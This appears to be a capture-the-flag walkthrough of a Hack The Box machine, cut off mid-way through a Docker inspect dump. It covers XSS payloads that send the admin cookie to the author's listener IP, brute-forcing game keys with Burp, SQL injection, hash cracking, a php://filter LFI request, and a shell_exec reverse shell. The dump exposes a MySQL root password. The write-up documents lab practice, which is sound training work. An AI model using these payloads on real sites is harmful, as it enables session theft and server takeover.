          <a href="img/portfolio/minor/red/htb_linux/FfufOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FfufOutput.png" alt=""></a>
          <p>Looks like we got a few interesting hits. So I'll add those to my /etc/Hosts file so we
          can take a look at them later on. So let's create a test account on the main page and
          let's see what we can find.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png" alt=""></a>
          <p>Interesting we can see a messaging service, a forum, a store and a place to register a
          key. We can also edit our own account. Let's take a look at the forum.</p>
          <a href="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png" alt=""></a>
          <p>Some guy on the forum told the staff that his username caused an issue on the scoreboard,
          and because his username is SingleQuoteMan I feel like this is a nod towards either XSS
          or SQLI. We can probably steal a cookie from the admin if we use XSS in our username,
          because it will run when we message a staff member for support.</p>
          <a href="img/portfolio/minor/red/htb_linux/SendingMessage.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SendingMessage.png" alt=""></a>
          <p>Now we'll just need to find a XSS script that will steal the cookie for us so we can use
          it. I tried a fair number of PHP cookie stealers but with out any luck.</p>
          <p> I tried to follow this guide <a href="https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/">https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/</a>
          and tried a number of different XSS scripts.
          </p>
          <code class="prettyprint">&#x3C;img src=x onerror=this.src='http://10.10.14.40:8888/'</code>
          <a href="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png" alt=""></a>
          <code class="prettyprint">&#x3C;iframe src=http://10.10.14.40:8888/shell.php height=”0”
          width=”0”>&#x3C;/iframe></code>
          <p>But none of these worked. I did manage to steal my own cookie but when I tried stealing
          the admin's I get an "Unsupported ssl" error. So I probably have to make the cookie
          stealer server run on https. But before that I wanted to try to steal it one more time
          without using Java Springboot.</p>
          <a href="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png" alt=""></a>
          <p>It was a longshot but worth the try because Springboot does a lot of stuff underwater and
          it just works most of the time. I used another XSS script as well because the other ones
          spammed my terminal full of bogus output.</p>
          <code class="prettyprint">&#x3C;script>document.location="http://10.10.14.88:8888/cookie?c="
          +
          document.cookie&#x3C;/script></code>
          <a href="img/portfolio/minor/red/htb_linux/AdminCookieJava.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AdminCookieJava.png" alt=""></a>
          <p>And this worked! We got the admin cookie now all that's left is to change our cookie to
          the admin's and refresh the page!</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png" alt=""></a>
          <p>We are logged in as admin but now what? From the looks of it we got a few new tabs in the
          navbar. Game and Dev are the subdomains we've already found but admin could be
          interesting.</p>
          <a href="img/portfolio/minor/red/htb_linux/ValidateAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ValidateAPI.png" alt=""></a>
          <p>It is an admin panel mostly used to validate game keys.</p>
          <a href="img/portfolio/minor/red/htb_linux/GameKeyForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GameKeyForum.png" alt=""></a>
          <p>If we look back at the forum we can see that they are having trouble validating the game
          keys and that they resorted to an offline manual method. Let's download the offline key
          validator and see what we can find.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          #!/usr/bin/env python3
                                          import sys
                                          from re import match
          
                                          class Key:
                                          key = ""
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
          
                                          def __init__(self, key:str, magic_num:int=346):
                                          self.key = key
                                          if magic_num != 0:
                                          self.magic_num = magic_num
          
                                          @staticmethod
                                          def info() -> str:
                                          return f"""
                                          # Game-Key validator #
          
                                          Can be used to quickly verify a user's game key, when the API is down (again).
          
                                          Keys look like the following:
                                          AAAAA-BBBBB-CCCC1-DDDDD-1234
          
                                          Usage: {sys.argv[0]}
                                          &#x3C;game-key&#x3E;"""
          
                                              def valid_format(self) -> bool:
                                              return
                                              bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                              self.key))
          
                                              def calc_cs(self) -> int:
                                              gs = self.key.split('-')[:-1]
                                              return sum([sum(bytearray(g.encode())) for g in gs])
          
                                              def g1_valid(self) -> bool:
                                              g1 = self.key.split('-')[0]
                                              r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                              if r != [221, 81, 145]:
                                              return False
                                              for v in g1[3:]:
                                              try:
                                              int(v)
                                              except:
                                              return False
                                              return len(set(g1)) == len(g1)
          
                                              def g2_valid(self) -> bool:
                                              g2 = self.key.split('-')[1]
                                              p1 = g2[::2]
                                              p2 = g2[1::2]
                                              return sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
          
                                              def g3_valid(self) -> bool:
                                              # TODO: Add mechanism to sync magic_num with API
                                              g3 = self.key.split('-')[2]
                                              if g3[0:2] == self.magic_value:
                                              return sum(bytearray(g3.encode())) == self.magic_num
                                              else:
                                              return False
          
                                              def g4_valid(self) -> bool:
                                              return [ord(i)^ord(g) for g, i in zip(self.key.split('-')[0],
                                              self.key.split('-')[3])] == [12, 4, 20, 117, 0]
          
                                              def cs_valid(self) -> bool:
                                              cs = int(self.key.split('-')[-1])
                                              return self.calc_cs() == cs
          
                                              def check(self) -> bool:
                                              if not self.valid_format():
                                              print('Key format invalid!')
                                              return False
                                              if not self.g1_valid():
                                              return False
                                              if not self.g2_valid():
                                              return False
                                              if not self.g3_valid():
                                              return False
                                              if not self.g4_valid():
                                              return False
                                              if not self.cs_valid():
                                              print('[Critical] Checksum verification failed!')
                                              return False
                                              return True
          
                                              if __name__ == "__main__":
                                              if len(sys.argv) != 2:
                                              print(Key.info())
                                              sys.exit(-1)
                                              input = sys.argv[1]
                                              validator = Key(input)
                                              if validator.check():
                                              print(f"Entered key is valid!")
                                              else:
                                              print(f"Entered key is invalid!")
                                      </code>
                                      </pre>
           <p>This is the original code it looks like they validate the key in parts so if we can
          reverse engineer these parts we can find out how to crack the key.</p>
          <a href="img/portfolio/minor/red/htb_linux/PythonCompiler.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PythonCompiler.png" alt=""></a>
          <p>I put the Python code in an online compiler and removed all the functions and made it
          into a script. Then I put all the results in variables so we can see if a try is
          valid.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          from re import match
          
                                          class Key:
                                          key = "KEY01-0H0H0-XPAA0-GAME1-1295" #defaultkey=AAAAA-BBBBB-CCCC1-DDDDD-1234
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
                                          valid = False
                                          cs_value = 0
                                          cs_valid = False
                                          g1_valid = False
                                          g2_valid = False
                                          g3_valid = False
                                          g4_valid = False
          
                                          valid =
                                          bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                          key))
                                          print("valid_format: ", valid)
          
                                          gs = key.split('-')[:-1]
                                          cs_value = sum([sum(bytearray(g.encode())) for g in gs])
                                          print("cs_value: ", cs_value)
          
                                          ### g1 discovered by changing the first 3 characters untill the r value matched
                                          g1 = key.split('-')[0]
                                          r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                          print("r: ", r)
                                          if r != [221, 81, 145]:
                                          g1_valid = False
                                          for v in g1[3:]:
                                          try:
                                          int(v)
                                          except:
                                          g1_valid = False
                                          g1_valid = len(set(g1)) == len(g1)
                                          print("g1_valid: ", g1_valid)
          
                                          ### g2 discovered by putting p1 on 0 and shifting p2 until it matched
                                          g2 = key.split('-')[1]
                                          p1 = g2[::2]
                                          p2 = g2[1::2]
                                          g2_valid = sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
                                          print("g2_valid: ", g2_valid)
          
                                          # TODO: Add mechanism to sync magic_num with API
                                          g3 = key.split('-')[2]
                                          if g3[0:2] == magic_value:
                                          g3_valid = sum(bytearray(g3.encode())) == magic_num
                                          else:
                                          g3_valid = False
                                          print("g3_valid: ", g3_valid)
          
                                          ### Same approach as g1 try different values untill they matched
                                          print("g4: ", [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])])
                                          g4_valid = [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])] == [12,
                                          4, 20, 117, 0]
                                          print("g4_valid: ", g4_valid)
          
                                          ### The CS value is just a byte sum of the whole key so this has to be the last value to
                                          crack and is pretty easy because we can just print the real CS value and match it
                                          cs = int(key.split('-')[-1])
                                          print("cs: ", cs)
                                          cs_valid = cs_value == cs
                                          print("cs_valid: ", cs_valid)
          
                                          def check(self) -> bool:
                                          if not self.valid_format():
                                          print('Key format invalid!')
                                          return False
                                          if not self.g1_valid():
                                          return False
                                          if not self.g2_valid():
                                          return False
                                          if not self.g3_valid():
                                          return False
                                          if not self.g4_valid():
                                          return False
                                          if not self.cs_valid():
                                          print('[Critical] Checksum verification failed!')
                                          return False
                                          return True
                                      </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png" alt=""></a>
          <p>We cracked the code but the only thing that didn't work is part G3 because the magic
          number seems to be different on the server. When we try to validate it locally using the
          original validator script the key is valid. But maybe we can bruteforce this magic
          number using Burpsuite. There are only 60 possible combinations because the magic number
          is a sum of the last 3 characters, because the code said that the first two "XP" are
          static, And each character has a specific value. So I made a list.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          KEY01-0H0H0-XPAA0-GAME1-1295
                                          KEY01-0H0H0-XPAB0-GAME1-1296
                                          KEY01-0H0H0-XPAC0-GAME1-1297
                                          KEY01-0H0H0-XPAD0-GAME1-1298
                                          KEY01-0H0H0-XPAE0-GAME1-1299
                                          KEY01-0H0H0-XPAF0-GAME1-1300
                                          KEY01-0H0H0-XPAG0-GAME1-1301
                                          KEY01-0H0H0-XPAH0-GAME1-1302
                                          KEY01-0H0H0-XPAI0-GAME1-1303
                                          KEY01-0H0H0-XPAJ0-GAME1-1304
                                          KEY01-0H0H0-XPAK0-GAME1-1305
                                          KEY01-0H0H0-XPAL0-GAME1-1306
                                          KEY01-0H0H0-XPAM0-GAME1-1307
                                          KEY01-0H0H0-XPAN0-GAME1-1308
                                          KEY01-0H0H0-XPAO0-GAME1-1309
                                          KEY01-0H0H0-XPAP0-GAME1-1310
                                          KEY01-0H0H0-XPAQ0-GAME1-1311
                                          KEY01-0H0H0-XPAR0-GAME1-1312
                                          KEY01-0H0H0-XPAS0-GAME1-1313
                                          KEY01-0H0H0-XPAT0-GAME1-1314
                                          KEY01-0H0H0-XPAU0-GAME1-1315
                                          KEY01-0H0H0-XPAV0-GAME1-1316
                                          KEY01-0H0H0-XPAW0-GAME1-1317
                                          KEY01-0H0H0-XPAX0-GAME1-1318
                                          KEY01-0H0H0-XPAY0-GAME1-1319
                                          KEY01-0H0H0-XPAZ0-GAME1-1320
                                          KEY01-0H0H0-XPBZ0-GAME1-1321
                                          KEY01-0H0H0-XPCZ0-GAME1-1322
                                          KEY01-0H0H0-XPDZ0-GAME1-1323
                                          KEY01-0H0H0-XPEZ0-GAME1-1324
                                          KEY01-0H0H0-XPFZ0-GAME1-1325
                                          KEY01-0H0H0-XPGZ0-GAME1-1326
                                          KEY01-0H0H0-XPHZ0-GAME1-1327
                                          KEY01-0H0H0-XPIZ0-GAME1-1328
                                          KEY01-0H0H0-XPJZ0-GAME1-1329
                                          KEY01-0H0H0-XPKZ0-GAME1-1330
                                          KEY01-0H0H0-XPLZ0-GAME1-1331
                                          KEY01-0H0H0-XPMZ0-GAME1-1332
                                          KEY01-0H0H0-XPNZ0-GAME1-1333
                                          KEY01-0H0H0-XPOZ0-GAME1-1334
                                          KEY01-0H0H0-XPPZ0-GAME1-1335
                                          KEY01-0H0H0-XPQZ0-GAME1-1336
                                          KEY01-0H0H0-XPRZ0-GAME1-1337
                                          KEY01-0H0H0-XPSZ0-GAME1-1338
                                          KEY01-0H0H0-XPTZ0-GAME1-1339
                                          KEY01-0H0H0-XPUZ0-GAME1-1340
                                          KEY01-0H0H0-XPVZ0-GAME1-1341
                                          KEY01-0H0H0-XPWZ0-GAME1-1342
                                          KEY01-0H0H0-XPXZ0-GAME1-1343
                                          KEY01-0H0H0-XPYZ0-GAME1-1344
                                          KEY01-0H0H0-XPZZ0-GAME1-1345
                                          KEY01-0H0H0-XPZZ1-GAME1-1346
                                          KEY01-0H0H0-XPZZ2-GAME1-1347
                                          KEY01-0H0H0-XPZZ3-GAME1-1348
                                          KEY01-0H0H0-XPZZ4-GAME1-1349
                                          KEY01-0H0H0-XPZZ5-GAME1-1350
                                          KEY01-0H0H0-XPZZ6-GAME1-1351
                                          KEY01-0H0H0-XPZZ7-GAME1-1352
                                          KEY01-0H0H0-XPZZ8-GAME1-1353
                                          KEY01-0H0H0-XPZZ9-GAME1-1354
                                      </code>
                                      </pre>
          <p>First we need to intercept to post so we can copy it.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png" alt=""></a>
          <p>Now we can send it to the intruder to start brute-forcing this magic number.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png" alt=""></a>
          <p>I've added the payload which is the list of possible combinations we've just compiled.
          Now we need to add it into the POST.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png" alt=""></a>
          <p>Now let's start attacking!</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png" alt=""></a>
          <p>That didn't go as planned it looks like all the requests got redirected let's look at the
          settings if we can change anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png" alt=""></a>
          <p>Looks like Burpsuite just needed to be allowed to follow redirects. This is probably also
          the reason why our first GoBuster attempt failed.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png" alt=""></a>
          <p>Now to second attack is way more promising. One key stands out because the response
          length is different from the rest. Let's try that key and see what happens.</p>
          <a href="img/portfolio/minor/red/htb_linux/KeyValidationTest.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/KeyValidationTest.png" alt=""></a>
          <p>And it worked! Now lets go back to our normal user account and add this key to our
          account.</p>
          <a href="img/portfolio/minor/red/htb_linux/AddKeyToUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AddKeyToUser.png" alt=""></a>
          <p>Now we got the key added to our account we can take a look at that game subdomain we
          found earlier.</p>
          <a href="img/portfolio/minor/red/htb_linux/Scoreboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Scoreboard.png" alt=""></a>
          <p>Something I noticed instantly is the scoreboard that the SingleQuoteMan talked about on
          the forum. Maybe we can do the same trick with SQLI as we did with XSS at the beginning.
          We can do a simple SQLI test to find out if it's vulnerable.</p>
          <a href="img/portfolio/minor/red/htb_linux/VulnForSQLI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/VulnForSQLI.png" alt=""></a>
          <p>It is vulnerable but we didn't match the columns hence why it didn't show any output so
          lets try that again.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLVersion.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLVersion.png" alt=""></a>
          <p>Now look at that this should be easy. Lets try to enumerate the database tables.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIDBDump.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIDBDump.png" alt=""></a>
          <p>A user table? Very interesting lets see if it contains any passwords or usernames.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIUsers.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIUsers.png" alt=""></a>
           <p>And it does! Looks like we got an admin username and a password hash we need to crack.
          But first lets find out what type of hash it is.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashIdentifier.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashIdentifier.png" alt=""></a>
          <p>Looks like it's a SHA1 hash lets see if Hashcat can find the password for us.</p>
          <code>hashcat -a 0 -m 100 adminhash.txt /usr/share/wordlists/rockyou.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/Hashcat.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Hashcat.png" alt=""></a>
          <p>Yes it can! Now lets try to use these credentials to log into the dev subdomain.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png" alt=""></a>
          <p>Lets try to run Dirbuster one more time to see if it finds anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/Dirbuster.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Dirbuster.png" alt=""></a>
          <p>Almost forgot we have to add the PHPSESSID from this admin to Dirbuster otherwise it
          won't have access to enumerate the site.</p>
          <a href="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png" alt=""></a>
          <p>Dirtbuster found a file called /actions/file.php which could be interesting. By the looks
          of it this is the file that is running on the homepage of this subdomain as well but
          there it said it didn't have a GUI yet. Maybe we can use it without GUI now we know the
          location of the file. But we need to know the command because now it gives us an
          error.</p>
          <a href="img/portfolio/minor/red/htb_linux/SpecifyFile.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SpecifyFile.png" alt=""></a>
          <p>Lets try some common command in this context like file, path and filepath. Hey! Filepath
          worked and now we can execute files and apparently also the hashingTool that is also on
          the homepage.</p>
          <a href="img/portfolio/minor/red/htb_linux/FileExecuted.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FileExecuted.png" alt=""></a>
          <p>Lets take a look at LFI (Local File Inclusion) and see if we can do something with that.
          I've found this <a href="https://medium.com/@nyomanpradipta120/local-file-inclusion-vulnerability-cfd9e62d12cb">website</a>
          that explains a LFI vulnerability we could try</p>
          <code>https://dev.earlyaccess.htb/actions/file.php?filepath=php://filter/convert.base64-encode/resource=/var/www/earlyaccess.htb/dev/actions/hash.php</code>
          <a href="img/portfolio/minor/red/htb_linux/HashBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashBase64.png" alt=""></a>
          <p>This gave us the base64 of the hash.php file if we can convert it back to code we might
          be able to find a vulnerability.</p>
          <a href="img/portfolio/minor/red/htb_linux/DecodedBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DecodedBase64.png" alt=""></a>
          <p>Using an online base64 decoder we managed to find the source code of the hash.php
          file.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              &#x3C;?php
                                              include_once "../includes/session.php";
          
                                              function hash_pw($hash_function, $password)
                                              {
                                                  // DEVELOPER-NOTE: There has gotta be an easier way...
                                                  ob_start();
                                                  // Use inputted hash_function to hash password
                                                  $hash = @$hash_function($password);
                                                  ob_end_clean();
                                                  return $hash;
                                              }
          
                                              try
                                              {
                                                  if(isset($_REQUEST['action']))
                                                  {
                                                      if($_REQUEST['action'] === "verify")
                                                      {
                                                          // VERIFIES $password AGAINST $hash
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['hash']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
          
                                                              $_SESSION['verify'] = ($hash === $_REQUEST['hash']);
                                                              header('Location: /home.php?tool=hashing');
                                                              return;
                                                          }
                                                      }
                                                      elseif($_REQUEST['action'] === "verify_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE VERIFICATION
                                                      }
                                                      elseif($_REQUEST['action'] === "hash_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE-HASHING
                                                      }
                                                      elseif($_REQUEST['action'] === "hash")
                                                      {
                                                          // HASHES $password USING $hash_function
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
                                                              if(!isset($_REQUEST['redirect']))
                                                              {
                                                                  echo "Result for Hash-function (" . $_REQUEST['hash_function'] . ") and password (" . $_REQUEST['password'] . "):&#x3C;br>";
                                                                  echo '&#x3C;br>' . $hash;
                                                                  return;
                                                              }
                                                              else
                                                              {
                                                                  $_SESSION['hash'] = $hash;
                                                                  header('Location: /home.php?tool=hashing');
                                                                  return;
                                                              }
                                                          }
                                                      }
                                                  }
                                                  // Action not set, ignore
                                                  throw new Exception("");
                                              }
                                              catch(Exception $ex)
                                              {
                                                  if($ex->getMessage() !== "")
                                                      $_SESSION['error'] = htmlentities($ex->getMessage());
          
                                                  header('Location: /home.php');
                                                  return;
                                              }
                                              ?>
                                          </code>
                                      </pre>
          <p>After analyzing the source code it looks like if you send the debug parameter as true and
          the hashing_function as shell_exec, you
          can run any shell command you want from the hashing tool. So lets try that.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png" alt=""></a>
          <p>Looks like it worked now lets try to get a reverse shell.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WWW-DataShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-DataShell.png" alt=""></a>
          <p>And we're in! I looked in the /etc/passwd and noticed another user named www-adm which
          looked like the next user I needed. After looking around for a bit and I couldn't find
          anything I thought what if they reused passwords?</p>
          <a href="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png" alt=""></a>
          <p>And they did so now we have www-adm shell. After looking around I noticed a .wgetrc file
          with some credentials in it. Because it looked like docker was running on the machine I
          thought http://api:5000/ was my best bet.</p>
          <a href="img/portfolio/minor/red/htb_linux/WGETAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETAPI.png" alt=""></a>
          <p>And it was! Apparently there is a check_db endpoint but it required credentials. So I
          tried to credentials we've just found.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatCheckDB.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatCheckDB.png" alt=""></a>
          <p>Looks like JSON but we first need to prettify it to make it more readable.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              {
             "message":{
                "AppArmorProfile":"docker-default",
                "Args":[
                   "--character-set-server=utf8mb4",
                   "--collation-server=utf8mb4_bin",
                   "--skip-character-set-client-handshake",
                   "--max_allowed_packet=50MB",
                   "--general_log=0",
                   "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                ],
                "Config":{
                   "AttachStderr":false,
                   "AttachStdin":false,
                   "AttachStdout":false,
                   "Cmd":[
                      "--character-set-server=utf8mb4",
                      "--collation-server=utf8mb4_bin",
                      "--skip-character-set-client-handshake",
                      "--max_allowed_packet=50MB",
                      "--general_log=0",
                      "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                   ],
                   "Domainname":"",
                   "Entrypoint":[
                      "docker-entrypoint.sh"
                   ],
                   "Env":[
                      "MYSQL_DATABASE=db",
                      "MYSQL_USER=drew",
                      "MYSQL_PASSWORD=drew",
                      "MYSQL_ROOT_PASSWORD=XeoNu86JTznxMCQuGHrGutF3Csq5",
                      "SERVICE_TAGS=dev",
                      "SERVICE_NAME=mysql",
                      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
                      "GOSU_VERSION=1.12",
                      "MYSQL_MAJOR=8.0",
                      "MYSQL_VERSION=8.0.25-1debian10"
                   ],
                   "ExposedPorts":{
                      "3306/tcp":{
          
                      },
                      "33060/tcp":{
          
                      }
                   },
                   "Healthcheck":{
                      "Interval":5000000000,
                      "Retries":3,
                      "Test":[
                         "CMD-SHELL",
                         "mysqladmin ping -h 127.0.0.1 --user=$MYSQL_USER -p$MYSQL_PASSWORD --silent"
                      ],
                      "Timeout":2000000000
                   },
                   "Hostname":"mysql",
                   "Image":"mysql:latest",
                   "Labels":{
                      "com.docker.compose.config-hash":"947cb358bc0bb20b87239b0dffe00fd463bd7e10355f6aac2ef1044d8a29e839",
                      "com.docker.compose.container-number":"1",
                      "com.docker.compose.oneoff":"False",
                      "com.docker.compose.project":"app",
                      "com.docker.compose.project.config_files":"docker-compose.yml",
                      "com.docker.compose.project.working_dir":"/root/app",
                      "com.docker.compose.service":"mysql",
                      "com.docker.compose.version":"1.29.1"
                   },
                   "OnBuild":null,
                   "OpenStdin":false,
                   "StdinOnce":false,
                   "Tty":true,
                   "User":"",
                   "Volumes":{
                      "/docker-entrypoint-initdb.d":{
          
                      },
                      "/var/lib/mysql":{
          
                      }
                   },
                   "WorkingDir":""
                },
                "Created":"2021-10-04T06:57:43.698655618Z",
                "Driver":"overlay2",
                "ExecIDs":null,
                "GraphDriver":{
                   "Data":{
                      "LowerDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d-init/diff:/var/lib/docker/overlay2/ecc064365b0367fc58ac796d9d5fe020d9453c68e2563f8f6d4682e38231083e/diff:/var/lib/docker/overlay2/4a21c5c296d0e6d06a3e44e3fa4817ab6f6f8c3612da6ba902dc28ffd749ec4d/diff:/var/lib/docker/overlay2/f0cdcc7bddc58609f75a98300c16282d8151ce18bd89c36be218c52468b3a643/diff:/var/lib/docker/overlay2/01e8af3c602aa396e4cb5af2ed211a6a3145337fa19b123f23e36b006d565fd0/diff:/var/lib/docker/overlay2/55b88ae64530676260fe91d4d3e6b0d763165505d3135a3495677cb10de74a66/diff:/var/lib/docker/overlay2/4064491ac251bcc0b677b0f76de7d5ecf0c17c7d64d7a18debe8b5a99e73e127/diff:/var/lib/docker/overlay2/a60c199d618b0f2001f106393236ba394d683a96003a4e35f58f8a7642dbad4f/diff:/var/lib/docker/overlay2/29b638dc55a69c49df41c3f2ec0f90cc584fac031378ae455ed1458a488ec48d/diff:/var/lib/docker/overlay2/ee59a9d7b93adc69453965d291e66c7d2b3e6402b2aef6e77d367da181b8912f/diff:/var/lib/docker/overlay2/4b5204c09ec7b0cbf22d409408529d79a6d6a472b3c4d40261aa8990ff7a2ea8/diff:/var/lib/docker/overlay2/8178a3527c2a805b3c2fe70e179797282bb426f3e73e8f4134bc2fa2f2c7aa22/diff:/var/lib/docker/overlay2/76b10989e43e43406fc4306e789802258e36323f7c2414e5e1242b6eab4bd3eb/diff",
                      "MergedDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/merged",
